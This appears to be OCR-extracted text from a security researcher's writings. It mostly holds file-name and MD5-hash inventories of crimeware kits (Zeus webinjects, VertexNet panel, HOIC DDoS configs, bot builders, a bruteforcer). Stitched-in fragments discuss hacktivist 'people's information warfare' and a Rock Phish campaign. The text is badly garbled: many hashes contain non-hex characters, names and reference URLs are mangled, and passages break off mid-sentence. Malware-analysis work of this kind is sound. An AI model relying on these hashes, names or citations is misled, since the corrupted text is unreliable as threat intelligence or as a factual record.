KEYGEN.RES 
515a036d41334d08cf725d995844c3b5 
LFxDi2cTC6INtyMMc.frm 
1cf8d0c6fda061aad820d0a49a72ad57 
MdmYvtro2IG5dtdDjNhhYb6H.cls 
24231ac062c5ad30438137aela/7aee22 
Mh5iVE95qSd1HhfuQmzhx.frm 
7526cba3f4b26eefcal0d4c416c136ef 
MKPwsSt9uTu.frm 
67cb6fld8ab0ecc09521a21838d676d6 
Modulel.bas 
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98bcfab4be68cfebc97085b53b91e90a 
MovQaVcP4jfKSOJANNi8.bas 
85bf30b2b699c81c2b4al2e4bff61e26 
MSSCCPRJ.SCC 
207a3110d79f11bb8306b37475alddc7 
O4INNiOsVGFOM4Dx4tOd.bas 
be869faecd3c6007bedbbc9924c09fab 
OliGjyTjRdHvDrot.bas 
94c4ed45ac6cab7a819ddc14b27d4864 
OpYvAdNEnwMk2.frm 
38cfaal0cdab361fdeefd43f40a60c75 
P1LHEeG4scqwnZDWyF6Sot.frm 
1b4eea86f174b85f5242011edf6dd655 
PcuiSGMNss8156jW4dTkF.vbp 
3f5f03082139ebf1bc92007df2e4535f 
PM1VJhsks.frm 
3a9622746f4e209baa276576eb921de0 
Q38vuXogTbLIRcbq.frm 
c0cbc3932a4ab29642997028f83ceb6df 
QtFlgDzzfgEeK4BOR.frm 
bf21lelaf986613b9c5a0e0c61cae4a62 
res.exe 
a7f85126bc2f475a249004e46a59bba9 
res.ini 
92d0156cb29a8db9b1d4a0641ad6cb14 
res.log 
ef9b4e71e333fbc2ce0457097f631072 
RLhxTRbvijoSl0ej58.bas 
1¢c5157df57eb54f8fa883c861a10db28 
S1jVLc9IRJ5eU.frm 
4f372047be07cad918b5fa9415f59d81 
SscEazUFxkHoYUd4JR6uE.frm 
bb6db9556fb5ea37ba9e62d6427dbdf2 
TPpgIK5flfF96MWcJUdk.bas 
65c634461c7e2cb1514c1lfaa4b45e476 
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UF7inQcjika.frm 
91c763b04d2a1298cab1480c86db2f75 
UfaJct899PTisAxPwQh.frm 
0c7d231bb74881055f5925fd7e7ab420 
USG 0.9.exe 
76e01lallad08c3f231laf23af23b1b255 
USG 0.9 _new.exe 
37fcff57d2faded4ea82afd442e033f7 
USG Settings. ini 
05964ela7c1ff3eed5165451f76051lee 
W7oTXsyFSz8fbual.frm 
5f8376e95098b4b75f97cl1fc51d87ffd 
WAjH6kKCYZgKq2AIXD9cnAVbi42XU.frm 
468a742ceeleab6540c4d20a14a70097 
X46lhcl6jJ6EIN.frm 
965c8da31683629e84fa4b45ael188bcb 
Xe4TljuPRZUUxIUt.cls 
Of4e14ff0bb95d2fF7078a593b045935 
XtuEj8aSfDOxD.bas 
785c02c4050551a06fb9aecla77blea8s 
XznpJS5LDMYKPXQD/7apd.frm 
796443743a3d490b2730e18d335ba332 
YqltnPLVOyANKS3ZUzd.frm 
a61e630107d5b85ac2237daelaa20508 
Good Bye v3.0.exe 
eea3c1840dadeeb2b53b5fe1091c9314 
MSWINSCK.OCX 
9484c04258830aa3c2f2a70eb041414c 
RICHTX32.0CX 
045a16822822426c305ea7280270a3d6 
welcome.wav 
47fe6a75068766e184600fed2db35f42 
CreateBot.bat 
61c6caf77f53273e7186e3454f2cf358 
HC - Client 2.6.exe 
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381a7975408bc5ad7602c75b68cc42c3 
Info.ini 53a9e98e33f1d88660ba62a2cd7818fe 
ReadMeg ....txt 
365d932931724102c06b2afa308513ac 
Bot Compressed.exe 
ef99141f2573bde86899ef7be2036be0 
Bot NotEdited.exe 
85ccc5e53f58eelecc5166b7fb47ca5f 
server.exe 
b9facb4fa796cb795506617e21fcc7c5 
server original.exe 
eb0b8da99f51a0ab4b1cd3433a3c68b3 
Codejock.Controls.v13.4.0.Demo.ocx 
bab9a2a9eae830ed495cbbfefifb7 7f9 
CODEJO 1.oca 
940e225116684f37fb387fc33fdb7d05 
comctl32.0cx 
eb5f811c1f78005b3c147599a0cccf51 
COMDLG32.0CX 
d76f0eab36f83a31d411laeaf70da7396 
MSCOMCTL.OCX 
ecc7d7f0d3446de36045d1d9e964fafe 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
0a107bbf1l38aaac2daeac73cb56f1le00 
CreateBot.bat 
61c6caf77f53273e7186e3454f2cf358 
Info.ini b3a4673af42dd7d47aba817b4466c7e2 
ReadMeg ....txt 
365d932931724102c06b2afa308513ac 
Codejock.Controls.v13.4.0.Demo.ocx 
bab9a2a9eae830ed495cbbfefifb7 7f9 
CODEJO 1.oca 
940e225116684f37fb387fc33fdb7d05 
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comctl32.o0cx 
eb5f811c1f78005b3c147599a0cccf51 
COMDLG32.0CX 
d76f0eab36f83a31d41laeaf70da7396 
MSCOMCTL.OCX 
ecc7d7f0d3446de36045d1d9e964fafe 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
0a107bbfl38aaac2daeac73cb56f1le00 
Hack.exe 66064dbdb70a5eb15ebf3bf6é5aba254b 
Icon _1.ico 
8c4f592491dcc9c7a2d04cbb35f1f3b0 
RemoveBot.bat 
0381b30e53b41fc5b9f14b77b4996e18 
upx.exe 
308f709a8f01371a6dd088a793e65a5f 
Hack.exe 66064dbdb70a5eb15ebf3bf65aba254b 
Icon _1.ico 
8c4f592491dcc9c7a2d04cbb35f1f3b0 
RemoveBot.bat 
0381b30e53b41fc5b9f14b77b4996e18 
upx.exe 
308f709a8f01371a6dd088a793e65a5f 
DUTCH FREEDOM.txt 
bf52ede817b83d7d35eca8ffe5bfcdle 
DutchFreedom.hoic 
8545406e9887fff9b7d23bd8d1ba827a 
GenericBoost.hoic 
117dcd32592d6785a55c9ceac79bd557 
HOIC DOCUMENTATION FOR HACKERS.txt 
cl1fdac966d5923ce44a6aal07bd3d82 
hoic.rdp.rop 
ec16992ad983106a7a3c6d4c78914425 
hoic2.1.exe 
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451¢94a23536dcbba422d7612b34b6ff 
user-agent-test.hoic 
bc3480db06614b5e56376559d4138c8e 

visa _stress.hoic 
4715a3d5e2323168c4afeb3637fc127b 
buttons.rar 
7d7495cdeb9b52f12d32460027782d0d 
4add.png 062587a5eb25732f2dc466abal26a21c 
6266.png d899f1c4072365d42dd6eacbdf8d9280 
666.png 

59ff8d3a3539122b35142116a3a8a0ac 
6666.png b63b5663149586f34127fd3c47d26cca 
add.png 

8ade13213352f64d34e561d2e0a0f454 
add2.png d98f80edfa546f413106fac5b1de9877 
add3.png ae39f32971ba9b649e1e817c2cf6les8e 
button - Copy.png 
3e759alfdc0a9cb94239284af36ae651 
button.png 
3e759alfdc0a9cb94239284af36ae651 
button3.png 
37c9854daf077cd50a91e4bf0dd320bf 
button4.png 
O01dcd72ab51e145129ec54cae7cbfle5 
button5y.png 
01dcd72ab51e145129ec54cae7cbfle5 

lazer.png 

5dfc0a47f6309048ae3a68208685c3b8 
remo4ve.png 
1d1172a772171f24b0615e59442bd329 
remove.png 
Oefffla2c8d7d86cee7b9963a7662a20 
removeqw.png 
ffab67111f3d2ab27a9ae03c37b36edb 
scripts.png 
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want to use them, they’ll simply turn off their anti virus software, the one they use to prevent 
malware infections, but in a "people’s information warfare" they can go as far as consciously 
becoming a part of a hacktivism centered botnet. Take this DoS tool featured in the screen- 
shot for instance, it has a high detection rate only if the anti virus software is running, but 
in situation where a "malicious culture of participation" is the desired outcome it doesn’t 
really matter. Donating their bandwidth and pretending to be malware infected is far more 
dangerous than botnet masters acquiring DDoS capability by figuring out how to infect the 
massess. It’s one thing to operate a botnet and direct it to attack a certain site, and entirely 
another to be infected with a malware that’s DDoS-ing the site, a situation where you become 
an "awakened and fully conscious zombie host". 


The World of Information Warfare 
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Examples of the "People’s Information Warfare Concept" : 


- [8]During the China/U.S hacktivism tensions in 2001 over the death of a Chinese pilot 
crashing into an AWACS, [9]Chinese hacktivists released mail bombers with pre-defined 
U.S government and military emails to be attacked, thus taking advantage of the people’s 
information warfare concept 


- The release of the Muhammad cartoons had its old-school hacktivism effect, namely 
[10]mass defacements of Danish sites courtesy of Muslim hacktivists to achieve a decent 
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ed2d9ac71a3b1fd52877d43bfec87aca 
turbo.png 
e8b3ac5debf7542e40526aedcb02f90a 
turbo2.png 
fa31b0cf31b92be8700f0c8c4059ae03 
HostBooter v5.5 Fixed Crack by The Old Warrior.exe 
980bb7a94366c35b575dd3d6bc84fc68 
Server.exe 
637e6dff08f9be30cc796alca3a03f24 

6.iCcoO 

1852ec9e68f8367d70f8945c4f9ea714 

80000 Words PassList #.txt 
351f41390dcab7a66567c0d40125cd45 

80000 Words PassList #.txt.txt 

9.ico 

5df47f911b63f3b1d9de9d9de2717c47 
bassmod.dll 
e4ec57e8508c5c4040383ebe6d367928 

C.ico 

796953da2bb85f677c3a0e12df4f9169 
Cyber.ico 
dcfafd171269c3243befd6881b8bebda 

DOS.PL 

2b144bfef5787b7af36a5d7646c9b43a 
DOS.PL.bak 
ec2270360af3f52055da7d98012cf78e 

dossc.pl c58b078cced8d98dda43102cO0080fa5c 
easyelements Heart Brushes.abr 
6ac624c9313362606466baec075a2e66 
FIFA.ico e229af3b32c39edcd8fa973189667c5c 
finder Adm.pl 
c2a4885103b6902a16f56a623744d7ba 

Icon Pack.rar 
4ab4cf2ccb2alec10f4c2cObe73b36f1 

Info.txt 54399a62a5c8c13e3021032b1c53ca02 
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kasperski.ico 
9cfc67ee6b03f076da9212662171e54e 
license.dat 
817331e736cb3c4d9f8b20c884c1la4cb 
lol.pl 
cac4869c27ce0f89cda33ac3d8969b0a 
lol.pl.bak 
1d8928a457b3fec0844fd5e675e70219 
lol7.pl 
f7f4a98fe8a00df75efe511272274957 
music.xm 1a3ec013628d62db7d25eb808c0cc94b 
Nouveau document texte.txt 

SLIC.bin 
07fd6f24d133711e29afaf6c462167d4 
SPED.ico 5a259817a6d87f7bb599b6aa97cC38288 
wand.dat c8bcb79d8df44a55819eb9c98dcb6db29 
wtf. pl 
19dc74abe4ab4091191flfc50be0980b 
yanagi love _brushes.abr 
97d73663d3966c9ada0cb49dc15d9263 
Ccombo.CFF 
6a56392a0b480b12820f5e95a11b0816 
CForcelNl.dat 
3fc89c5ffa8fc6bfla64b8c28fd2f8 Of 
comdlg32.0cx 
ab412429fle5fb9708a8cdea07479099 
Hit.wav 
102f5355ff472db1ac846030cd6e557f 
HitLog.txt 

3e€280b065445380ae7 2dfaeb520b448f 
HitLogProxy.txt 
a6ebad8a420a5438ad21e37139de8ebf 
judges.txt 
220c0d1e95ab70fe2a191b2bab934f00 
judges.txt.txt 
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MainHitLOg.txt 
53c4f9c9c33d13286c213b510e381cbe 
MSWINSCK.OCX 
e8a2190a9e8ee5e5d2e0b599bbf9ddab 
ncFZrF8X.txt 
56fc951clcaf65bd7e5170c2c83983f5 


PPPP.txt 5dcfcfd01275671a62264fe9e2el1d3cf 


Readme.txt 
8ed7ae22500a3dl1df2ae6a0fd3fd5457 
Registrator.exe 
0a107bbfl38aaac2daeac73cb56f1e00 
RICHED32.DLL 
6801f45dfac0743d3a0d73b121e261da 
RICHTX32.0CX 
045a16822822426c305ea7280270a3d6 
Wordlist 05-April-2003.txt 
lacc5e1751be8dea292fdeb1le94a9d2d 
DEBUGcthomenshonradoscom4.txt 
181a46e30a7da51ff712e07d40626e5f 
DEBUGcthomenshonradoscom5.txt 
f2da5aa919d4f57e08e1016dfbf65983 
DEBUGcthomenshonradoscom6.txt 
f2da5aa919d4f57e08e1016dfbf65983 
DEBUGmembersbrazzerscom2.txt 
f2da5aa919d4f57e08e1016dfbf65983 
DEBUGmembersbrazzerscom3.txt 
f2da5aa919d4f57e08e1016dfbf65983 
DEBUGmemberspornproscom10.txt 
ea0f5747a0afcda035b0143e9a7b7c5f 
DEBUGpornstarcom1.txt 
428f771c83a7a7a280c636acd9d2b51a 
DEBUGpornstarcom9.txt 
42f3b47c6399a58ae718b4b2ffa35609 
DEBUGpx3fr10.txt 
7e739a78cbled376ec54da86d2e45e4e 
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DEBUGpx3fr11.txt 
7e739a78cbled376ec54da86d2e45e4e 
DEBUGrockcitycomulecom10.txt 
8e096173221ff54aeec1f4465a7ad460 
DEBUGwelt3traviande4.txt 
Ofe8a995a2dfd5cef205e905e8581d81 
DEBUGwwwindigitalworkscom11.txt 
e86815e95a5db5545f5642fe5cbfdca6 
DEBUGwwwjymnmagoncom/7.txt 
68b97127be4240acbefl8efc51d589b4 
DEBUGwwwjymnmagoncoms.txt 
88f8267c15ef58c8b24cf9b83328890a 
HIT DEBUG _memberspornproscom10.txt 
0c959ea9c5397d0cee44552c31cb9b35 
HIT _DEBUG _pornstarcom1.txt 
219ce96ec7abdae3e93e28a8bcf5929b 
HIT DEBUG _welt3traviande4.txt 
9627b84a5a410bc67d5a77cf6e4a5386 
HIT DEBUG _wwwjymnmagoncom/7.txt 
4df968bf10a6866d1e257de59bbladf5 
HIT DEBUG _wwwjymnmagoncoms.txt 
bc92a8a2e27153e163291e0828ebdca7 
HitFile.txt 
1dc134a9bcbc54d451fa791454036263 
HitFileProxy.txt 
fe1419131631219adfb994d466a2cdb1 
Siteurls.txt 
b11e1a751831a8d487cce6836b0894fb 
3 

8f9c57bd12f09583f6f52920celfba24 
Cforce _HITS.txt 
f8a5d258ddelcc6e03403e0c55f704al 
Webpanel.zip 
3¢2170737e2a12e7395915bf00b7f980 
AG.Configuration.SettingsProviders.dll 
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7936d33b7f050ff8792d90a763bafbc9 
AG.Deployment.Updating.dll 
bbd2ae604e6b416519482408172b3c60 
AG.Eazfuscator.NET.Hosting.x86.exe 
5e7dfl6a2bb078c4faf1356ac487a9de 
AG.Eazfuscator.NET.Hosting.x86.exe.config 
86d102894104ee39ee7b6e86d789027b 
AG.Eazfuscator.NET.Installer.dll 
ebd6659389cb9f66c16e0f3ae5 1def62 
AG.Eazfuscator.NET.Installer.InstallState 
8340e57c6861aa09b7ac38e04ee8e33d 
AG.Eazfuscator.NET.Settings.dll 
7d1a873710df94f4245d2facd53adf45 
AG.Eazfuscator.NET.Updating.dll 
8b357f73560438678490d818ee0fd84a 
Castle.Core.dll 
373e67537921844ae51d17ed23536840 
Castle.Windsor.dll 
fdc26852c6f776572c77176bf100c02F 
Eazfuscator.NET Assistant.exe 
932f76cb22b81f57fed5428e14cb30aa 
Eazfuscator.NET Assistant.exe.config 
fa20774317f76aca63edcc3eff8b7e8a 
Eazfuscator.NET.chm 
b0947ea00da61151d330939aea838800 
Eazfuscator.NET.exe 
043a898a2b5f0cc46aea8ad19a8be357 
Eazfuscator.NET.exe.config 
aef633b0018b8310607dacfa26d95191 
EULA. rtf f72956eb295bb3ec59c0ca92f4c20573 
ICSharpCode.SharpZipLib.dll 
8bc795fb6d0d6b098b9a707a156a3610 
Microsoft.Cci.MetadataHelper.dll 
819435e600619e739e1e939dlebfc5da 
Microsoft.Cci.MetadataModel.dll 
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5d3840a769b0233e008048ee631c0864 
Microsoft.Cci.MutableMetadataModel.dll 
€238407e3f7772a4578ec1c40e264fce 
Microsoft.Cci.PeReader.dll 
75249956e707d5c36557d316faa0ac79 
Microsoft.Cci.PeWriter.dll 
a6bfoédb2bac50acc7355551a99aaf59b 
Microsoft.Cci.SourceModel.dll 
cf49e1aada9168528c3c53b628a0f063 
Mono.Cecil.dll 
d17acbc4220138e1d647bdb42badfe43 
Mono.Cecil.Pdb.dll 
a6c410c328b67c506e89455b968eaal7 
ObfuscationAttributes.cs 
c7b512e314c07d081193256dbadb8645 
ObfuscationAttributes.vb 
Occ3e8c994566b7f8828e09d0f77f84e 
Eazfuscator.NET.SDK.dll 
9a4211ff54baclfa6fdbal2c2d8ca943 
Eazfuscator.NET.SDK.xml 
Oa0e0d9f7b086444bd8f34486a49b4fa 
Eazfuscator.NET Updater.exe 
230d6ad35cd3b94b2d3f444fd6c101a2 
Logo Small.bmp 
b04decaafa088365ab96e6b452394ad0 
settings. ini 
cel468f50ec5bd32bd5fe7c91fa36099 
AssemblyInfo.cs.aes 
e56a35123d50595650e53c4261fddb6b 
CollectInformations.cs.aes 
21e22991aa898e3bca04a8f3188d8ce9 
Configuration.cs.aes 
4cf93ba181fe3d83a1774fa03e663b00 
ConnectionSession.cs.aes 
fd4cea89f0a1787fc5fa429411e5089d 
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Download.cs.aes 
2356e3406498a4053990dc77394c6dd0 
HttpFlood.cs.aes 
8cad39ce5dcf09868f0bc5b38cb36bcb 
Install.cs.aes 
dfbf264925a707ae797a601a4c5f9e62 
Interop.UPNPLib.dll 
€85262cd139924b56737221c197c24c7 
Mapping.cs.aes 
93b47c1e764d219aa8a8b65cefobb6fda 
Mutex.cs.aes 
636e4c17e52ea995170c006fba5e05df 
FTP Bruteforcer by D4rK3y.exe 
d76e91252828244cee4aaa795d6a3e4d 
PasswordList.txt 
d274ba2ee861b3d055ef6a54cf950f2d 
README.txt 
8ac628ad0d26826e0bc764f54fad8a9a 
Index.html 
Oced6a20d3ccb62alaeaa8cc787cee78 
index2.html 
b64f05d30682bc135b07048375ad5a0f 


post.php c97a936ade06392759e2bf2f48912103 


Sun Microsystems Java Security Update 6.jar 


45761a3d209c1cb308a22545d6a8b966 
Icon01.ico 
2f2429ebec0cb515de572daa21af36be 
Icon02.ico 
111bd394a2570cdaclb6b7e511laace25 
Icon03.ico 
311705112206b60b4facO5a03bdeafcd 
Icon04.ico 
d8271455f17d850cd10343724f838e3c 
Icon05.ico 
8d63492512d853bb217d7d33e655b01d 
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Icon06.ico 
476a3b82a1f9f1e603a50ebd0f6c2364 
Icon07.ico 
03f55bc3fc8e0399418dleccaa3cd5ed 
Icon08.ico 
3d757c45346c992ce7947438f3024d21 
Icon09.ico 
7¢014e49f28343fd6ea383fe21lebd6e55 
Icon10.ico 
b17f080d357c2052ac61a901dd64d296 
Icon11.ico 
4d6da825c79f9d2815276a470001edd9 
Icon12.ico 
6421d6ff1l0cO2bc3b9be2e87af5d9433 
Icon13.ico 
7545087733d829f96e217645988878ac 
Icon14.ico 
8227dbde5b5a0919742acce2e8ec55eb 
Icon15.ico 
58f4d18fb6b70cf14d4d94a6a345f7a2 
Icon16.ico 
6036713ff3b93596851ff000455456f5 
Icon17.ico 
f21e6c9752dbb791284a434b79b61d19 
Icon18.ico 
e157aed280d85d697773c4962dfb6a5d 
Registrator.exe 
0a107bbf1l38aaac2daeac73cb56f1e00 
Thumbs.db 
e4c3a7c9c63625f5080bdd8077045bc1 
checksum.dll 
9b6f0596770059d9ce26a4bf8d9ddba4 
MoneyML.exe 
584f022c7d4de027d8085d2c6bea856e 
MoneyML.pdb 
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21c3b7fd3b1ldd8d7edcc8618e2c8c941 
MoneyML.xml 
17de465ca928bd498a4el1c4ef00726cd 
index.php 
d0db537dbfd282cfdcbce54ac38eae44 
index.php.bak 
a418af65a24920dcca320d8d1e78a946 
index1.php 
4c176aa0930e2bab3ad89fc3a01a8951 
style.css 
5ea854107536dc420ef2150b3537be86 
Registrator.exe 
0a107bbfl38aaac2daeac73cb56f1e00 
SCLabel.ocx 
649bd837a3739460ade06c99aac4bc38 


Skin.skf 8bfc40d34ca8fdc3c5f2856ead6281e7 


SkinCrafter3 _vs2005.dll 
b5acb37197211dc215907499bc105745 
FREE Counter-Strike hacks!.url 
f7bfe368b2890aaa99 7feffc4a641633 
Need help - Go to the CS Forum.url 
d7b1c11b9a6f9a4a3086e4068aae830d 
ReadMe.txt 
9fe5d4707738d943c463f847a040f90d 
SSWv7.0.exe 
58680bc18125ce12fd894a88bc48df9a 
TobysCheat.txt 
b1c2f0891le5e5f20b50ee832fadc7774 
readme.txt 
2f737f83926dcce398a749d9e3b4eda0 
Unremote.org.url 
6ec69332ale1a0da768646dcde4a6983 
VertexNet.url 
476675a4fbfcbc8e59176d1ab970f9e3 


adnan.ico 
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[1L1]PSYOPS effect online and in real-life 


- [12]The Israel vs Palestine Cyberwars is a great example of how [13]DIY web site de- 
facement tools were released from both sites which resulted in a web vulnerabilities audit of 
the entire web space they were interested in defacing to spread hacktivism propaganda 


- [14]Cyber jihadists taking advantage of the "people’s information warfare" concept by 
syndicating a list of sites to be attacked from a central location, and promoting the use of a 
Arabic themed DoS tool against "infidel" supporting sites 


- [15]What exactly happened during Russia’s and Estonia’s hacktivism tensions? The 
[16]voting poll that is still available indicates that people believe it was botnet masters with 
radical nationalism modes of thinking. But judging from the publicly obtainable stats, ICMP 
often comes in the form of primitive DIY DoS tools compared to [17]the more advanced attacks 
for instance. Collectivist societies do not need coordination because they know everyone else 
will do it one way or another. 


Power to the people. 
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UPDATE: 


[18]Turkish hackers target Swedish Web sites - " Hackers in Turkey have attacked more than 
5,000 Swedish Web sites in the past week, and at least some of the sabotage appears linked 
to Muslim anger over a Swedish newspaper drawing that depicted the Prophet Muhammad’s 
head on a dog’s body. Around 1,600 Web sites hosted by server-provider Proinet and 3,800 
sites hosted by another company have been targeted, Proinet spokesman Kjetil Jensen said 
Sunday. Jensen said hackers, operating on a Turkish network, at times replaced files on the 
sites with messages. " 


itp: / www. alerandrasanvel,con/dissertation/plfe/Samel-Hacktivisn- entire, pal 
. http: //ddanchev. blogspot . com/2007/09/storm-worms-ddos-attitude-part—two. html 
_http://adanchev blogspot .con/2007/09/storm-vorns-ddos-attitude html 

| hep //wwy. var org. uk/cip/resources/uk/e1d014. hea 
_ ictp:/ aww. var org. uk/eip/resources/uk/Doody Hodges pp 
_hetp://Adanchev blogspot .con/2007/08/chinas~cyber~espionage-anbitions_ Hal 


http: //ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 


ttp://news.bbc.co.uk/1/hi/world/americas/1305755.stm 
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ttp://ddanchev.blogspot.com/2007/08/your-point-of e 
tp://ddanchev. blogspot .com/2007/05/ddos-on-deman 


. -dos-t . 

_ tp: //ddanchev blogspot .cot/2007 /08/your~point-of-view-requested.ntal 

. http://www. imedialearn. com/imediapol1/poll. php?code=f 1156c3943c972139c62bc91c17e2c53 
_ tp: //ddanchev blogspot .co#/2007 /05/ddos~on-desand-vs~ddos~ extortion. Kea 


. http://www.boston.com/news/world/europe/articles/2007/10/08/turkish_hackers_target_swedish_web_sites/ 
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pm.png 
ba41b8c349070250f814188080c2a8e8 
pn.png 
e4dcc857f534b48e8377ee36f63be013 
pr.png 
40b7fbl1a4clebb076d40f0df5c6fd59a 
ps.png 
68d5f99924c67ef7d3b3aa32ff22b805 
pt.png 
5b8ab69ac52129bd32a3927f1b94d170 
pw.png 
f2bff7cd01d8eff6401e811f3debaf4f 
py.png 
b9d3d10b185a3144e21a452903857870 
ga.png 
c1dc363a27f5b5d19e24032747d7bedf 
re.png 
clcf1874c3305e5663547a48f6ad2d8c 
ro.png 
d038c9c152c5e14f875c7b13afcd4711 
rs.png 
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5b672e3ee63317614288615ba07 74bf7 
ru.png 
Od31lef75adef220e73f0cb93a84a7422 
rw.png 
bef92348e3ea38dc462326elba2ff622 
sa.png 
605884cec6f446d418a092c0941acad5 
sb.png 
5e4b74f8a611742bdc3a04629e871eb4 
Sc.png 
39650e922851e1b72165d7b016dc3b44 
scotland.png 
eca5bebe6e4dbc9eb858d4f58ea3f9de 


sd.png 
b972f90fea3369c020d258d1b860a6e0 
se.png 
4c01f06db23324267e2802dcade3572f 
sg.png 
8af65159c137a6a7ed3d1bc9c2eed18b 
sh.png 
e707aacb0986ad7a4a60ab8d82cf093d 
si.png 
d94ea79a5a8e0b6900941a1271c58191 
sj.png 
559ce5baaee373db8dal50a5066c1062 
sk.png 
5a7edc7e4492629ea5ce24b830839d32 
sl.png 
73904ec1cf4f0be282693c4e954e5821 
sm.png 
56e3c1b483bf27e619146b50ee5181bc 
sn.png 
501a5fab662d127ad588825cd0cd4954 
so.png 


4be2ffc4d06de407434a877dcO03ff88b 
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sr.png 
8f9aca73767b8e7876c72add438a6007 
st.png 
ab272a50ea656512c036cO001fcaca6lc 
Ssv.png 
c6c853766dfbab2ddd225980d3012f5c 
sy.png 
a0886eca3ef87d646af1514d025752f6 
Sz.png 
€97675a21b5280b9cb4c1fc99aab004f 
tc.png 
50733ccc670058e9a737b652089287ca 
td.png 
6c8d3f6c96bcd5d34a0bae497d0el3ca 
tf.png 
f7ccbaa513a24eb3dc4c7860ab8007ee 
tg.png 
5c62720575f914ffff9fe06e2b9c1b95 
th.png 
af85286bflcadae9c2c636fe83195251 
thanks.txt 
004f8ec8e015781342410c15b45bdf32 
tj.png 
5cc548d1858d19f336ca7390b381ad07 
tk.png 
896fb1a34638a76361d4307668cd5414 
tl.png 
093e76da6759647c331ea75eflba9da0 
tm.png 
b36ce71226fad4da67764e05b800292b 
tn.png 
ae9947d99c48894d1d1824d624361eb9 
to.png 
ce868fde2d77788a669001995f4b73df 
tr.png 

10938 


31ea1f705854ad57c432845068bd05d3 
tt.png 
9ead47e1d48627b1806cd992b62c8c2b 
tv.png 
6fec556dd8bd936ca706b0d7cc864993 
tw.png 
0e41af2b3ca03d145e7665d0821931fa 
tz.png 
C846788492ef1188f631113bd8cced5c 
ua.png 
7ef7a6f5def3a4117d5c2f08e37008ff 
ug.png 
17e134aa84a076bf5541f5d11c616e5d 
um.png 
fOf12f4afaccb13ea40e15f3b81c5921 
us.png 
968591e0050981be9fa94bd2597afb48 
uy. png 
9ca8f3d9b1b1101d30a4555c997e871b 
uz.png 
37e4bdb64229f4624cacec7d4297214d 
va.png 
493642ad6bf3a344602fe006e7d44fa2 
vc.png 
60eec8d579d55ea0f2ec62d837c104d2 
ve.png 
3aee24fa5f6a85f5ce452001182fdccc 
vg.png 
79ef17575149f2663df51419f39feff2 
vi.png 
€95b9175142cd29177a9b25e16c3fc39 
vn.png 
638136bla6f5dab7beb6cec84fcc2cd53 
vu.png 
c37b82a52cdf80492ee94dc7f46256cf 
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wales.png 
42¢7ca83721190322499c94d7ff2ae26 
wf.png 
86cclaa337ebb6cb74a2c3196770a7f5 
ws.png 

68183f64328d121a9ee7 7a92319bbfcd 
ye.png 
290e09160bb2ef42ba8129a41159eb07 
yt.png 
f46c7cd7b2474cbcf61c5b2007a7558f 
Za.png 
98e1044d0ffd1llafc67a79f3676ba97a 
zm.png 
ec69def9e77d23446867caeb4a5223b1 
Zw.png 
e7ae0b7e3c49a5a775a9d6854912e21a 
connection.inc.php 
e64beade985340bbe5e98607d54b79fa 
functions.inc.php 
48ff9a8c7ba4c2ceb8fcca60cba09a62 
sessioncontrol.inc.php 
6350181102df79308e933cbbc0fe3091 
settings.inc.php 
8591ca45e6dfb109ce9e9fef912cd952 
tasksutils.inc.php 
8bfeb00c1cce992a13271d3b2963aeee 
jsfunc.js 
257¢9216e552ac68e9bd5ae78e909b3b 
vertexnet.sql 
0f57711f36246177d7fdd379410de311 
bankofamerica.txt 
2356b26a28a98208bc168b422b680898 
paypal.txt 
78d3651983aad1c8f17fcae9be208db7 


usaa.txt fad49c53dd9cc3ff88882a09042f973d 
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zeus.suo 03d5e68541658f7dcl0d9866ffOf03F7 
config 
c€21f969b5f03d33d43e04f8f136e7682 
config.txt 
6108dab776beec25037975f053cf605f 
settings. ini 
098a662fa2684afc4f4006192004f99b 
webinjects.txt 
798f654ef8af8db3c44355d4bfda9ee4 
redir.php 
13afe10566f6918d02d076fc28196ec1 
sockslist.php 
d7160bb8a1e244d8fa8584088fe60a64 
cp.php 
€1607012286b0fcOde254c249fc6071e 
index.php 

server[php].zip 
2566f35a56a69a90d603fbe6698bd3be 
geobase.txt 
46df69a6d67ab725b642f9f19c47e299 
index.php 
94ee255853c5f78e8bb0d51219de5233 
«htaccess 
183e8e4abc660eaba3c3da4bb82b0bcf 
botnet _bots.Ing.en.php 
ec349a745ab7377e0b1cf2fde5070355 
botnet _bots.Ing.ru.php 
017c53fc1919794c21801f279f155406 
botnet _scripts.Ing.en.php 
fof7dd4640db87d849fcae084cbef02f 
botnet _scripts.Ing.ru.php 
826920ee5df54d0dd6b991611b203380 
fsarc.php 
5961441ledf6éda9bd218f1d84c8a8422e 
global.php 
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1¢463221f832164f43a79186a6ef8fc8 
index.php 

Ing.en.php 
cf0e010a4a5b2944d9c330b5a78534cd 
Ing.ru.php 
95304c29927ce89e5f155c21b74f2ed6 
reports db.Ing.en.php 
775df9bde4761bc29c19ea11e558d597 
reports db.Ing.ru.php 
7f53a36e28d8c5cacca5d32935599b07 
reports _files.Ing.en.php 
aaaelf41d9d02df177c973a015b8ccca 
reports _files.Ing.ru.php 
35b9bdc91f40d8ade44fb9c84b3616d5 
stats _main.Ing.en.php 
a15f315569ed8227d0855c62194fac63 
stats _main.Ing.ru.php 
67e3089776d058716213bee0cca6ed14 
stats _main.php 
a83b4bf2ecbd81651b52c25b1c09d922 
stats _os.Ing.en.php 
2ba8b0a8548b40a42aa8cc6a4292Ff17b 
stats _os.Ing.ru.php 
961bdcb842a5ea58fe0659f480c90546 
stats _os.php 
7f5ela4dlaba26e790aalffc8905f7fe 
sys _info.Ing.en.php 
6bc3d4aaa2156laefdba7aefl43eleba 
sys _info.Ing.ru.php 
6e€3448b812e8316f40c23552fef568ad 
sys _info.php 
fc4a72637224a4a73d783090d018a942 
sys _options.Ing.en.php 
0e0calb2857f25066e04c583451e5456 
sys _options.Ing.ru.php 
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3.10.6 Assessing a Rock Phish Campaign (2007-10-08 15:12) 


Sk eee 


The majority of [1]Rock Phish campaigns usually [2]take advantage of [3]a single domain 
that’s hosting numerous different phishing scams targeting different financial organizations. 
However, another trend is slowly emerging and that is the development of phishing domain 
farms, either taking advantage of a shared hosting as you can see in the graph on the left, 
or fast-fluxing the campaigns to [4]increase the average time a phishing site remains online. 
Here’s the interesting part acting as proof on the [5Jemerging trend of so called [6]malicious 
economies of scale, and also, showcasing Rock Phish’s effiency vs security trade off due to 
the centralization of the campaign on a single IP only. In this campaign we see a single IP 
([7]200.77.213.15) hosting [8]38 rock phish domains, that on the other hand in a typical Rock 
Phish style host multiple phishing pages targeting different companies. 


